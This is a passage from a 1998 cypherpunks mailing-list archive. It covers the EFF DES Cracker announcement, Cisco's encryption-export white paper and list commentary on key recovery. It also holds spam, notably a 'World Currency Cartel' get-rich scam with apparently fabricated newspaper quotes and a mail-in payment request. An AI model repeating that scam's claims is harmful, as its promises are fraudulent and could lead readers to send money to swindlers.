represents a fundamental breakthrough in how we evaluate computer
security and the public policies that control its use.  "With the
advent of the EFF DES Cracker machine, the game changes forever," said
Whitfield Diffie, Distinguished Engineer at Sun Microsystems and famed
co-inventor of public key cryptography.  "Vast Internet collaborations
cannot be concealed and so they cannot be used to attack real, secret
messages.  The EFF DES Cracker shows that it is easy to build search
engines that can."

"The news is not that a DES cracker can be built; we've known that for
years," said Bruce Schneier, the President of Counterpane Systems.
"The news is that it can be built cheaply using off-the-shelf technology
and minimal engineering, even though the department of Justice and the FBI
have been denying that this was possible."  Matt Blaze, a cryptographer
at AT&T Labs, agreed: "Today's announcement is significant because it
unambiguously demonstrates that DES is vulnerable, even to attackers with
relatively modest resources.  The existence of the EFF DES Cracker proves
that the threat of "brute force" DES key search is a reality.  Although
the cryptographic community has understood for years that DES keys are
much too small, DES-based systems are still being designed and used
today.  Today's announcement should dissuade anyone from using DES."

EFF and O'Reilly and Associates have published a book about the EFF
DES Cracker, "Cracking DES: Secrets of Encryption Research, Wiretap
Politics, and Chip Design."  The book contains the complete design
details for the EFF DES Cracker chips, boards, and software.  This
provides other researchers with the necessary data to fully reproduce,
validate, and/or improve on EFF's research, an important step in the
scientific method.  The book is only available on paper because
U.S. export controls on encryption potentially make it a crime to
publish such information on the Internet.

EFF has prepared a background document on the EFF DES Cracker, which
includes the foreword by Whitfield Diffie to "Cracking DES."  See
http://www.eff.org/descracker/.  The book can be ordered for worldwide
delivery from O'Reilly & Associates at http://www.ora.com/catalog/crackdes,
+1 800 998 9938, or +1 707 829 0515.

                              **********

The Electronic Frontier Foundation is one of the leading civil liberties
organizations devoted to ensuring that the Internet remains the world's
first truly global vehicle for free speech, and that the privacy and
security of all on-line communication is preserved.  Founded in 1990 as a
nonprofit, public interest organization, EFF is based in San Francisco,
California.  EFF maintains an extensive archive of information on
encryption policy, privacy, and free speech at http://www.eff.org.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cwci@d-int.com
Date: Sat, 18 Jul 1998 06:51:27 -0700 (PDT)
To: cwci@d-int.com
Subject: VERY  IMPORTANT !!!
Message-ID: <032c64945061178POPSRVRES@popline.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend:

This is an extremely IMPORTANT announcement for you!

iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
                       IMPORTANT ANNOUNCEMENT
                       IMPORTANT ANNOUNCEMENT
                       '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
                       Your Future May Depend on it!!!
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

BUT FIRST, please read the following Editorial Excerpts from some 
important publications in the United States: 


New York Times:   "In concluding our review of financial organizxations
''''''''''''''''''''''''''''''''''''''''        to effect change in the 90's, special attention should
be called to 'World Currency Cartel' organization based in California. The
members of this organization are amassing hundreds of millions of dollars
in the currency market using a very LEGAL method which has NEVER
been divulged to the general public. While their purpose is not yet known,
their presence has most certainly been felt".

NBC Nightly News:   "Members of the World Currency Cartel organization,
'''''''''''''''''''''''''''''''''''''''''''''        who always keep Low Profile of themselves, are some
of the most powerful and wealthiest people in this hemisphere".

More Excerpts later, but first let us give you this "Important Announcement":
```````````````````````````````````````````````````````````````````````````````````````````````````````````
We are glad to announce that for the very first time, the World Currency
Cartel organization will instruct a LIMITED number of people worldwide on
HOW TO CONVERT $25 INTO ONE HUNDRED OF LEGAL CURRENCY.

We will transact the first conversion for you, after that you can quickly and
easily do this on your own hundreds or even thousands of times each and
every month. TAKE ADVANTAGE OF THIS "SECRET FLAW" !
                     ==================================

It is even more explosive than we have yet disclosed. While currency does
fluctuates daily, we can show you HOW TO CONVERT $99 INTO $580 as
many times as you want. That means, you will be able to CONVERT $99
American Legal Currency Dollars for $580 OF THE SAME. You can do this
as many times as you wish, every day, every week, every month. All very
LEGALLY and effortlessly!

It only takes about 5 to 10 minutes each time you do this. You can do this
from your home, your office or even while travelling. All you need is an access
to a phone line and an address. Best of all, you can do this from ANY CITY
ON THIS EARTH!!!

Again, we must reiterate, anyone can do this and the source is Never-Ending.
For as long as the global financial community continues to use different curr-
encies with varying exchange rate, this "SECRET FLAW" will exist.
                                                           ''''''''''''''''''''''''''''''''''''''''''''''''''''
As we have said earlier, we will do the first transaction for you and will also 
show you exactly how to do this on your own over and over again.

The amount of exchange you would do each time is entirely up to you.
Working just 2 to 10 hours a week, you can soon join the list of Millionaires
who do  this on a daily  basis  several  times  a day. The transaction is so 
simple that even a high school kid  can do it!

We at the World Currency Cartel organization would like to see a uniform
global currency backed by Gold. But, until then, we will allow a LIMITED
number of individuals worldwide to share in the Unlimited Profits provided
for by the world currency differentials.

We will espouse no more political views nor will we ask you to do so. We 
can say  however,  that  our  parent  organization  Diamond  International
benefits greatly by the knowledge being shared as we ourselves alongwith
YOU benefit likewise. Your main concern surely will be, how you will benefit.

As soon as you become a member, you can start making transanctions
from your home, office, by telephone or through the mail  and even while
travelling. As said earlier, we will do the first transanction for you and 
will show you exactly how to do this on your own over and over again.

No one can stop you from earning hundreds of thousands and even millions
of dollars each year for as long as this "SECRET FLAW" exists.
                                                       ''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Don't  believe us, experience it for yourself!
================================       Unlike anyone else, we will
assure you a great financial freedom and you will add to our quickly growing
base of supporters and you may join the list of Millionaires being created 
using the "SECRET FLAW" in the world currency market.
              ==============

DON'T ENVY US, JOIN US TODAY!!!
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii           

There is a one time membership fee of only $195.00. BUT, if you join us by
AUGUST 10, 1998; which is our company's  2nd  Anniversarry date, you can
join us for only $35 administrative cost. Your important documents, instructions,
contact name & addresses, phone numbers and all other pertinent information
will be mailed to you immediately. So, take advantage of our Anniversarry date
and join us today.

If you are replying  AFTER  AUGUST 10, 1998; you must pay $195.00 for the 
membership fee. NO EXCEPTIONS and no more e-mail enquiries please!

Upon becoming a member, you promise to keep all infos CONFIDENTIAL.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Should you choose to cancell your membership for any reason, you must
return all documents for a refund within 60 days.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IMPORTANT:
*****************
1.....Write your name & mailing address VERY CLEARLY on paper
2..... Below your address, please write your E-mail address (Optional)
3..... At the top Left Hand corner, write the word "New Member"
4..... Attach a CHECK or M.O. for $35 plus $3 for postage & shipping
        (TOTAL = US$ 38.00)
5..... Please make the Check/M.O. payable to "Diamond  Int." and mail to:
        
                                      DIAMOND  INTERNATIONAL
                                      9903  SANTA  MONICA  BLVD;
                                      SUITE  #  405
                                      BEVERLY  HILLS,
                                      CA 90212.     U.S.A.

( Outside  U.S.A.  Must add  US$10  EXTRA  for  shipping). US$ FUNDS ONLY!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Here are some more Editorial Excerpts:

Wall Street :          "A discreet group of Americans, operating under the guise
                             of World Currency Cartel have recently begun making
rumbles in the world finance market. While at this time, their game is not
completely known, they certainly be watched by those making major moves
in the currency contracts".

Financial Week :    "Watch them, monitor them, extract their knowledge
                             and try to become one of them. That is the soundest 
financial advice we could give to someone".

National Business Weekly :  "While this reporter has been left in the cold 
                                          as to its method of operation, we have been
able to confirm that World Currency Cartel and its members are literally 
amassing a great furtune overnight".

$$$$$$$$$$$$$$$$$$$$$$$$$$$$ E N D $$$$$$$$$$$$$$$$$$$$$$$$$$$$    
 

                                                           








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zxq_5@hotmail.com
Date: Fri, 17 Jul 1998 11:17:11 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: 2 Free copies...
Message-ID: <199807171817.LAA02198@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 The time is now to reach out to all the people on the 
 Internet.
 
 It's your business,how are you going to advertise your          
 product or service over the Internet?              

 Direct email puts you in front of millions of people who want to 
 know about your product or service.The most cost effective way  
 to make your business explode!

 Never before has it been possible to reach so many for so       
 little.

  We are the leaders in direct email because we do what we      
 say.Our data banks have email buyers for every business.

 Don't worry we will help you with a subject and letter that    
 will work for you.
.                                                                
      Guaranteed
  CALL 1-800-600-0343 ext,1669 leave message.
  CALL 1-702-796-6123 speak to a consultant.
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 17 Jul 1998 03:05:53 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Sex industry takes on US govt/Hormones improve whore moans http://stuffed.net
Message-ID: <19980717084625.28072.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

Click for STUFFED: Friday July 17 1998


<img src=http://stuffed.net/98/7/17/cover.gif width=300
height=380 border=0 alt='Click here for STUFFED, the new daily
 tabloid news, humor and babes newspaper from Eureka!'>

This is a combined text/html email. If your email client can
display html web pages  you probably won't see this text but
should see the front cover of today's issue above, which you
should  click on to read.  If you cannot see the cover, your
email client either cannot display html or its' options have
been set to  ignore html images.  In which case,  please ...
Click here to read today's! --> http://stuffed.net/98/7/17/

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BUFFU@aol.com
Date: Fri, 17 Jul 1998 08:37:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Civil disobediance only gets you an invitation to the anarchist's big bash
Message-ID: <89904731.35af6f4d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


     We are sending you an invitation to be one of our special guests this
year, big harry ass lawsuits are always of interest.  Bring a friend if you
like, but I have to warn you, Liberatarians are not welcome.  This years menu
includes red meat and poptarts.  Clothing is optional.

                Sincerely,

                   Beth




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KMHAsfaha@aol.com
Date: Fri, 17 Jul 1998 10:26:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: kmha@aol.com
Message-ID: <90f10915.35af77d7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


please i need some suggestions with topics for my informative speech, or may
some 
infromative speeches already outlined to use it for refrence.
    thankyou.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 17 Jul 1998 10:46:30 -0700 (PDT)
To: "Cypherpunks" <sidanie@ibm.net>
Subject: New Computer Software for Police
Message-ID: <199807171800.OAA05948@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Date: Thu, 16 Jul 1998 18:14:18 -0600
From: rmcreat@istar.ca (BC NFA)
Subject: New Computer Software for Police

NATIONAL FIREARMS ASSOCIATION
BRITISH COLUMBIA BRANCH

Announced on the 6 o'clock news July 15, 1998.

I ask you to read this please; while reading keep in mind
this is easily adaptable to observe firearms owners patterns.

Const. Oscar Ramos and Const. Raymond Payette of the
Vancouver City Police made announcement of their new
"Shame the Johns" software.  It is designed to share
information with all levels of police in the Lower Mainland
and elsewhere.

This software allows the tracking of vehicle movements
and buying patterns.  It allows police to predict when and
where you will be at anytime.  It is designed to collect
name, date of birth, license number, discription of vehicle
- -and-other-information.  It will automatically generate
a letter to send to the persons home informing other
family members of the persons activities.

Michelle Traver
SSAC
NFA-BC
1706 E. 1st Ave., Van., BC  V5N 1B1
1877-254-2100, local 604-254-2100
fax 604-255-2202






Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The New York Times on the Web <announce@inbox.nytimes.com>
Date: Fri, 17 Jul 1998 11:16:53 -0700 (PDT)
To: CUSTOMER@carta.nytimes.com
Subject: Great News...
Message-ID: <199807171854.NAA3471112@inbox.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Subscriber,

The New York Times on the Web has made it easier for you to stay
current and to make your way around our site, with a newly redesigned
home page and the addition of two features, Quick News and Page One Plus.

*** OUR NEW HOME PAGE  ***

CONTINUOUS NEWS. Our new home page gives you an instant look at the
top news from The Times, with updates throughout the day reflecting
news judgments from the editorial team of The Times on the Web. Breaking
news from the Associated Press, refreshed every 10 minutes, gives you
an immediate take on the changing world. And a new ticker brings you
a quick look at the current state of the market.

IMPROVED NAVIGATION. We've also made it simpler to get around our site,
with an easy to find, easier to use navigation panel that takes you
directly to the major news and feature sections with fewer clicks.

MORE LINKS TO MORE STORIES. Top features from around the site are now
highlighted on the home page as well, giving you faster access to news
and features from The New York Times.

http://www.nytimes.com


*** QUICK NEWS  ***

QUICK NEWS. Our new Quick News page is your best source for what's
happening right now. Regularly updated by the editors of The Times
on the Web, this page highlights and summarizes the top stories
developing at the moment, with links to other major news of the day.

http://www.nytimes.com/yr/mo/day/late/index.html


***  PAGE ONE PLUS ***

PAGE ONE PLUS. We've improved the presentation of the articles that
appear on the front page of the printed New York Times, with quick
links to the major sections of the newspaper.

http://www.nytimes.com/yr/mo/day/front/


We hope you'll make a point of visiting the site soon and letting
us know what you think.

Sincerely,
Rich Meislin
Editor in Chief
The New York Times Electronic Media Company



***********************************************************************
When you registered with The New York Times on the Web you indicated
that you wished to receive information about new features and services.
For assistance please consult The New York Times on the Web's Help
Center, where you can remove yourself from the mailing list on the
page "View or Edit Your Subscriber Profile", at:
http://www.nytimes.com/subscribe/help/email.html
Please do not reply to this e-mail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman@iris.com
Date: Fri, 17 Jul 1998 12:39:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GAK 4 -- For whom the Doorbell tolls
Message-ID: <85256644.006C6CB1.00@arista.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe there is nothing really good, really evil, or even really novel
about the Cisco et al proposal. That makes it hard for a technical
community like this one to evaluate it.

The controversy should not be around the technology, but around the
spin-doctoring. It is both wrong and dangerous to portray this as a step
forward in resolving the crypto export debate. It is comparable to the
Lotus Notes 64/40 encryption scheme or the Microsoft/Netscape and later
Lotus scheme for making strong cryptography available between exportable
browsers and international banks. These may be significant to some
customers and to some vendors, but they are not steps toward resolving the
controversy. They are more likely to extend the controversy, since they
decrease the urgency of the debate for some of the players.

There is no reason to believe this controversy will be settled anytime
soon. The battle continues with no plausible resolution because both sides
believe they will win if they hold out long enough. Civil Libertarians
believe that the public will not stand for the sorts of draconian controls
that will be necessary to enable universal snooping and that the courts
will rule such controls unconstitutional. The argument against this view is
that the American people are sheep and the Constitution says what the
Supreme Court says it does and have you looked at the makeup of the Supreme
Court lately? Big Brother thinks he will win because he has the pictures.
And because he always does.

So think of these confusing technological tweaks as sending food aid to the
starving peasants in the war zone. It might extend the war by masking some
of its most painful effects, and hence might in the long run be a bad
thing. But the effect is ambiguous at worst, and it's difficult to argue
with the humanitarian groups that want to do it.

I was involved with choosing the wording of the Lotus press release around
64/40. It was a constant effort to restrain the enthusiasm of the
marketeers who wanted to talk about how wonderful it was. I think we
overall did a good job of making it clear that this was not a great thing,
and that we hoped it would not be a long term thing. It was a small
improvement for a limited set of customers while we continued the war.

If you read Cisco's publications, they have been fairly restrained in their
enthusiasm. But some of their partners and some of the press coverage has
gotten completely out of hand. The most offensive testimonial is from
Novell:

"This solution represents a real step forward for U.S. encryption policy,"
said Eric Schmidt, CEO of Novell. "At last, we have a market solution that
meets the needs of consumers, corporations, law enforcement and national
security."

This seems like a case where we need to shoot the messenger.

     --Charlie Kaufman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charlie_Kaufman@iris.com
Date: Fri, 17 Jul 1998 12:39:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EFF Announces GAK 5
Message-ID: <85256644.006C6F08.00@arista.iris.com>
MIME-Version: 1.0
Content-Type: text/plain


Given that the EFF has demonstrated hardware capable of breaking DES in a
short period of time, they should now form an industry alliance asking for
general export permission for DES. If law enforcement ever needs to access
any encrypted data, they can bring it to EFF, along with a court order, and
EFF will "recover" the key. This should be allowed under the existing Key
Recovery exception, which says things are exportable if you provide the
government with a mechanism for getting at the keys!

Of course, some will claim that EFF is selling out to Big Brother by
manufacturing this technology, and that granting export permission for DES
will only prolong the pain of export controls. Others will claim that it is
wonderful that we have finally developed a technology that solves once and
for all the crypto debate. Flames will ensue.

[Note: In case it is not obvious to everyone, this note is a lame attempt
at sarcasm. Please don't hang me.]

     --Charlie Kaufman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 17 Jul 1998 13:26:02 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199807172040.QAA09454@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


The original paper is available at:
http://www.cisco.com/warp/public/146/july98/2.html

For any precise analysis, use the original document at the aforementionned address.



------------- begin "cut and paste" text ---------------
White Paper

The Export of Certain Networking Encryption Products under ELAs As An Alternative to
"Key Escrow/Recovery Products" under KMI: A Networking Industry White Paper on
Encryption Export Controls

by
Elizabeth Kaufman, Cisco Systems, Inc. and
Roszel C. Thomsen II, Thomsen & Burke LLP


     Encryption Press Release
     PR Contact: Doug Wills, (408) 527-9475, dwills@cisco.com



Executive Summary

The Clinton Administration's export control policy is designed to promote development of cryptographic products that provide law enforcement agencies with
access to encrypted data. Products that implement key escrow/recovery to provide such access are broadly exportable under License Exception KMI.
Although some customers have indicated interest in products that implement key escrow/recovery for stored data, customers generally oppose mandatory key
escrow/recovery for data in transit. This White Paper proposes that certain networking encryption products that provide for authorized access without key
recovery should also be eligible for broad export under appropriate Encryption Licensing Arrangements.

The Administration's export control policy must also reflect the equities of the intelligence community. Therefore, the proposed Encryption Licensing
Arrangements should be approved subject to riders and conditions designed to prevent the export of strong encryption products to military end-users, for
military end-uses, or to any government ministry, agency or department of certain countries.

The operational characteristics of networking encryption products to be eligible for export under appropriate Encryption Licensing Arrangements are not
complex. Simply stated, the operator action model delivers a 'private door-bell,' not a 'house-key' to parties lawfully seeking access to data. Qualifying
products must incorporate an operator-controlled management interface that enables dynamic, real-time access to specified network traffic prior to
encryption, or after decryption, at a designated access point.

Background

In Executive Order 13026 of November 15, 1996, President Clinton said that cryptographic products implementing the Key Management Infrastructure
("KMI") would be eligible for export without licenses after a one-time technical review.1 On December 30, 1996, the Commerce Department's Bureau of
Export Administration ("BXA") published an interim rule amending the Export Administration Regulations ("EAR", 15 CFR Part 730 et seq.) that implements
Executive Order 13026.2

The better-known provision of this interim rule states that "key escrow or key recovery products" are exportable under License Exception KMI. The term
"key escrow or key recovery products" is defined in great detail in Section 740.8(d)(1)(i) and Supplement No. 4 to Part 742 of the EAR.

A lesser-known provision of this interim rule states that "other recoverable encryption products" shall receive "favorable consideration" for export. The term
"other recoverable encryption items" is defined briefly in Section 740.8(d)(1)(ii) of the EAR, and the type of "favorable consideration" that should be accorded
to such products is not defined at all. The ambiguity of this provision provides an opportunity to explore new approaches to exporting cryptographic products.

Overview

Industry has studied the technical, market and policy issues surrounding the KMI. These studies suggest that there may be market demand for products
implementing key escrow/recovery techniques for retrieval of encrypted stored data. Such products would also appear to meet law enforcement's
requirements for retrieval of encrypted stored data. However, no market demand exists for products implementing key escrow/recovery techniques for
retrieval of encrypted transient data. Eminent cryptographers have argued that key escrow/recovery techniques create unnecessary risks for encrypted
transient data.3 The National Security Agency ("NSA") has confirmed these findings.4

The networking industry proposes that certain networking encryption products described in this White Paper may receive wide market acceptance and meet
the requirements of law enforcement with respect to transient data without implementing key recovery. The intelligence community's equities, though not
reflected in the EAR, must be respected as well.

Analysis of Market Requirements

In order to meet market requirements, networking encryption products must: (1) provide strong security, (2) adhere to open standards, and (3) support an
operator-controlled management mechanism to specify encrypted flows.

Strong security is essential for products that encrypt transient data. Customers, particularly service providers, have stated repeatedly and emphatically that they
will not purchase products that encrypt transient data, if those products also facilitate unauthorized, covert surveillance by third parties. The government should
encourage the deployment of products that implement strong security, because such products will deter certain kinds of crimes, like theft of trade secrets by
third parties.

Deployment of products that encrypt transient data requires open standards. Without open standards, different vendors' products will not inter-operate, and
broad deployment will not be possible. The government should encourage the deployment of standards-compliant products, because it has a shared interest in
a common cross-vendor solution and the rapid deployment of strong new viable technologies.

Some customers also have indicated that operator-control of encryption flows is a useful feature for network diagnostics and reporting, and for allowing the
efficient transmission of non-sensitive data. Customers in regulated industries, such as banking and securities, also may need to monitor their employees'
communications from time-to-time. Most customers also desire the ability to respond to a court order without exposing all of their data across the Internet or
the public switched telephone network.

Analysis of Government Requirements

The EAR describes key escrow/recovery products primarily in terms of their utility to law enforcement. The government's interests, however, are not
monolithic. The law enforcement and intelligence communities have different requirements.

Law enforcement's main priority has been to establish procedures for access to encrypted data in transit that are comparable to existing procedures for voice
communications and therefore capable of introduction into evidence in a court of competent jurisdiction. The technical characteristics of the networking
encryption products described in this White Paper will be of greatest interest to law enforcement, because these technical characteristics are the key to
meeting law enforcement's requirements for access to plaintext.

The intelligence community, on the other hand, has not shown much confidence that key escrow/recovery will meet its requirements since the secret Skipjack
algorithm and governmental escrow agents featured in the original Clipper Chip were abandoned in favor of vendor-selected algorithms and commercial
escrow agents. Its primary concern currently appears to be the broad deployment of encryption technology that does not interfere with current best
operational practices. In this regard, the technical characteristics of qualifying products may be of secondary importance to the intelligence community, and
proposed riders and conditions on the ELA may be of greater importance. 

An Alternative to Key Escrow/Recovery for Networking Products

Although key escrow/recovery is not acceptable for data in transit, some customers require a mechanism that can reveal real-time plaintext for network
diagnostics and reporting, the transmission of non-sensitive data, occasional employee monitoring, and to support law enforcement. The proposed alternative
to key escrow/recovery does not require weakened cryptography, yet provides access similar to that currently available for voice communications.

Packet switched data networks handle traffic differently than circuit-switched voice networks. Circuit switched voice networks are characterized by the
opening of a dedicated circuit where communications are transferred in "real time." Packet switched networks are a statistically-multiplexed environment where
communications are routed packet-by-packet, so that data is fragmented but delivered in near real time. In spite of these differences, packet switched data
networks can, with some limitations, enable real-time access to plaintext. The proposed alternative to key recovery provides customers with full-strength
encryption, while simultaneously enabling the dynamic creation of an access point that allows real-time interception of plaintext based upon the target's source
or destination, whether the product is located within an enterprise or at a service provider's premises.

Two Access Scenarios: Access in the Enterprise, and Access at a Service Provider's Premises

The access point concept is not a perfect solution for all products. For example, it does not easily apply to user-to-user desktop applications. However, it
does appear to offer a reasonable alternative to key recovery on many classes of network applications and platforms. Specifically, it is a viable approach to
access to plaintext for devices where the individual responsible for data creation/reception is not the same individual responsible for platform operation. Such
devices constitute a significant percentage of the available networked platforms, including firewalls, routers, switches and other networking devices.

Classes of Network Devices

            Self-managed
                              3rd party-managed
 Single-user
            Home PC
                              Enterprise desktop
                              Enterprise telephone
                              Set-top box
                              Service Provider VPN
                              Outsourced firewall
 Multi-user
            Enterprise network
            Enterprise server
            Multi-user workstation

Can provide access to plaintext without the end user's knowledge

Meeting Law Enforcement Requirements

In order to be exportable under the proposed Encryption Licensing Arrangements, networking encryption products must contain a management interface that
dynamically controls encryption by source and destination address, and by network protocol, to enable real-time access to selected network traffic prior to
encryption or after decryption. The operational characteristics of these products may be summarized below:

     a) A qualifying network encryption product must incorporate an encryption management interface that:
     i) is remotely accessible;
     ii) controls the encryption configuration of the platform;
     iii) configures encryption policy by source and destination network address;
     iv) enables a remote operator to modify the encryption configuration dynamically;
     v) enables the interception of network traffic between a specific source and destination either prior to encryption or after decryption at a defined access
     point;

     b) A qualifying network encryption product may:
     i) be hardware, software, or a combination of hardware and software;
     ii) encrypt any network protocol and/or at any network layer;
     iii) support any
          a) encryption algorithm
          b) key length
          c) key generation mechanism
          d) key management scheme;
     iv) be standalone, or integrated with other functions;
     v) be a single user, multi-user or infrastructure platform;
     vi) enable interception on the wire, on media (such as a hard disk), via a specialized communications port, or at another defined access point.

Two figures that illustrate how qualifying products may provide access to plaintext are set forth in Figures 1 and 2 of this paper.

Meeting Intelligence Community's Requirements

Current best operational practices are not widely understood by the public, and they may be compromised by the broad deployment of networking encryption
products, whether of US or of foreign manufacture. However, the possible loss of access to plaintext communications due to use of commercial cryptography
must be analyzed within the broader framework of advances in new technologies. As one eminent cryptographer testified before the Senate Judiciary
Subcommittee on Technology and the Law, "Advances in emitter identification, network penetration techniques, and the implementation of cryptanalytic or
crypto-diagnostic operations within intercept equipment are likely to provide more new sources of intelligence than are lost as a result of commercial use of
cryptography."5

In further recognition of and deference to the intelligence community's equities, industry is not requesting authorization to export products with key lengths
exceeding 56 bits to military end-users or for military end-uses, or to any government ministry, agency or department of the countries listed in "Tier 3" (as
defined for purposes of computer export controls). Exports of products exceeding 56 bits to these end-users would require a separate license issued by BXA
after full inter-agency review under applicable Executive Orders. The differences between the proposed ELA and export under License Exception KMI are
summarized in the chart below:

                 License Exception KMI
                                                        Proposed ELA
 Eligible Products
                 Key recovery products
                                                        Products providing access to plaintext at intermediate stations of the data network
 Territory
                 All except Cuba, Iran, Iraq, Libya, North Korea,
                 Sudan and Syria
                                                        Same as KMI
 Eligible End-users
                 All end-users are eligible
                                                        (1) All end-users are eligible for 56 bit products,
                                                        HOWEVER,
                                                        (2) Products exceeding 56 bits would not be eligible for government agencies and
                                                        military end-users in Tier 3 countries
 Duration
                 Indefinite
                                                        Three years, renewable in three year increments
 Reporting
                 Biannual
                                                        Same as KMI


                                                     Conclusion

This White Paper has defined a class of networking encryption products that should be authorized for export under appropriate Encryption Licensing
Arrangements. The operational characteristics of qualifying products ensure that law enforcement will continue to enjoy authorized real-time access to plaintext

References:
1. 61 FR 58767.
2. 61 FR 68572.
3. The Risk of Key Recovery, Key Escrow and Trusted Third Party Encryption,
H.Abelson et al. on June, 1998.
4. Threat and Vulnerability Model for Key Recovery (KR), NSA, X3
on February 18, 1998.
5. Key Escrow: Its Impact and Alternatives, testimony of Dr. Whitfield Diffie,
Distinguished Engineer, Sun Microsystems, Inc. before the Senate Judiciary
Subcommittee on Technology and Law on May 3, 1994.

Cisco Systems

Cisco Systems, Inc. (NASDAQ: CSCO) is the worldwide leader in networking for the Internet. News and information are available at
http://www.cisco.com.

For more information visit Cisco PR Contacts



All contents copyright (c) 1992--1998 Cisco Systems Inc. Important notices.
---------- end of "cut and paste" text ---------------

Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 17 Jul 1998 13:38:09 -0700 (PDT)
To: dcsb@ai.mit.edu
Subject: John Gilmore and the Great Internet Snake Drive
Message-ID: <v04011738b1d55fa3b8fe@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Congrats to Mr. Gilmore, EFF, et. al. for a very impressive DES crack.

It seems that Gilmore and Moore's Law have just turned the
once-respected DES into cryptographic snake-oil. He keeps hurting
snakes like that, he's gonna get himself canonized. ;-).


Seriously. Many thanks to Mr. Gilmore for proving, once again, that
lobbying is pointless, and that physics is not optional.

Outstanding. Marvellous.

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNa+x3cUCGwxmWcHhAQFZAQgArKCN418IA1MXwfpXeJ4IF93j9f3G3skH
OotWP5dcoHOaUvbgTcOWP9YBAj77jzaazrtfK3wJD634ehLbf5N+gzmBHQVnXtXR
Vf/JMe24EyI3xCqvRptSTtrik8d+oi3Wy7ZZEwBzLPd0A+XE4LdsClgE2C4ns3ZK
Lq12mUmRQaZvc4++oakIAOT+Llx9TnnUHYqVMSjDT8QJoJ7vEFBEqcOea1Qzk1u9
leZlyrLs1ivbhcthXNBOyhN6RTwJgRyF3nFxpl/uY0tEvNvgFl+/aZZTJkwvvhmm
0MTSfzFfy9I+7BT5FD1iFC+i8JAVd4CDeI+9I6c6/LCAppfrKy5FBg==
=Zeyp
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
